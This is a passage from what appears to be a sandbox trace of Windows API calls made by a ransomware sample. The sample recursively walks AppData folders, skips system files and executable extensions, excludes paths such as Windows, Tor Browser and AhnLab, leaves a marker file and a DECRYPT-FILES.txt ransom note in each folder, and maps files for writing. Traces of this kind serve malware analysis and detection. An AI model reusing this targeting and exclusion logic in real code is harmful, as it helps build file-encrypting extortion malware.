(lpBaseAddress=0x8a0000) returned 1 [0180.273] CloseHandle (hObject=0x268) returned 1 [0180.275] CloseHandle (hObject=0x264) returned 1 [0180.286] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.287] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4da76560, ftCreationTime.dwHighDateTime=0x1d4cb08, ftLastAccessTime.dwLowDateTime=0x7113d460, ftLastAccessTime.dwHighDateTime=0x1d4d301, ftLastWriteTime.dwLowDateTime=0xaa2b5860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x165f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ewVB7V5Jhjl32Wfh.m4a.C80Q1", cAlternateFileName="EWVB7V~1.C80")) returned 1 [0180.291] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="DECRYPT-FILES.txt") returned 1 [0180.291] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="autorun.inf") returned 1 [0180.291] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="boot.ini") returned 1 [0180.291] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="desktop.ini") returned 1 [0180.292] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="ntuser.dat") returned -1 [0180.292] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="iconcache.db") returned -1 [0180.292] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="bootsect.bak") returned 1 [0180.292] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="ntuser.dat.log") returned -1 [0180.292] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="thumbs.db") returned -1 [0180.292] lstrcmpiW (lpString1="ewVB7V5Jhjl32Wfh.m4a.C80Q1", lpString2="Bootfont.bin") returned 1 [0180.292] lstrlenW (lpString="ewVB7V5Jhjl32Wfh.m4a.C80Q1") returned 26 [0180.292] lstrcmpiW (lpString1="C80Q1", lpString2="lnk") returned -1 [0180.292] lstrcmpiW (lpString1="C80Q1", lpString2="exe") returned -1 [0180.292] lstrcmpiW (lpString1="C80Q1", lpString2="sys") returned -1 [0180.292] lstrcmpiW (lpString1="C80Q1", lpString2="dll") returned -1 [0180.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0180.292] lstrlenW (lpString="ewVB7V5Jhjl32Wfh.m4a.C80Q1") returned 26 [0180.292] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0180.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ewVB7V5Jhjl32Wfh.m4a.C80Q1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a.C80Q1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a.C80Q1" [0180.292] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ewVB7V5Jhjl32Wfh.m4a.C80Q1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ewvb7v5jhjl32wfh.m4a.c80q1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0180.292] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=5727) returned 1 [0180.292] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0180.293] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.299] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.300] CloseHandle (hObject=0x268) returned 1 [0180.300] CloseHandle (hObject=0x264) returned 1 [0180.300] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.300] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa301b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa301b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0180.300] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0180.300] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0180.300] lstrcatW (in: lpString1="Identities", lpString2="\\" | out: lpString1="Identities\\") returned="Identities\\" [0180.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Identities\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\" [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Program Files") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch=":\\Windows") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Games\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\All Users") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.300] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="AhnLab") returned 0x0 [0180.301] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.301] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0180.301] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.301] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\0a16c9.tmp") returned 68 [0180.301] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0180.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0180.306] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.306] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt") returned 75 [0180.306] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.306] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0180.306] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*" [0180.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee984080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee984080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0180.306] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.306] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee984080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee984080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.306] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.306] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.306] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee984080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee984080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee984080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.306] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.306] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.307] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.307] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.307] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.307] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.307] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned 57 [0180.307] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.307] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\" [0180.307] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\0a16c9.tmp" [0180.307] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.307] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.307] CloseHandle (hObject=0x0) returned 0 [0180.307] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.307] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa301b20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa301b20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa301b20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.307] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.307] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaa327c80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa327c80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0180.307] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0180.307] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0180.307] lstrcatW (in: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="\\" | out: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0180.307] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0180.307] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Program Files") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch=":\\Windows") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Games\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\All Users") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="AhnLab") returned 0x0 [0180.308] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0180.308] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.308] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\0a16c9.tmp") returned 107 [0180.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0180.308] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.308] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt") returned 114 [0180.309] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.310] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0180.310] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*" [0180.310] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee984080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee984080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.310] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.310] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xee984080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee984080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.310] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.310] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.310] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xee984080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xee984080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xee984080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.310] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.310] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.310] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.310] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.310] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.310] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.311] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned 96 [0180.311] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.311] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0180.311] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\0a16c9.tmp" [0180.311] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\0a16c9.tmp" (normalized: 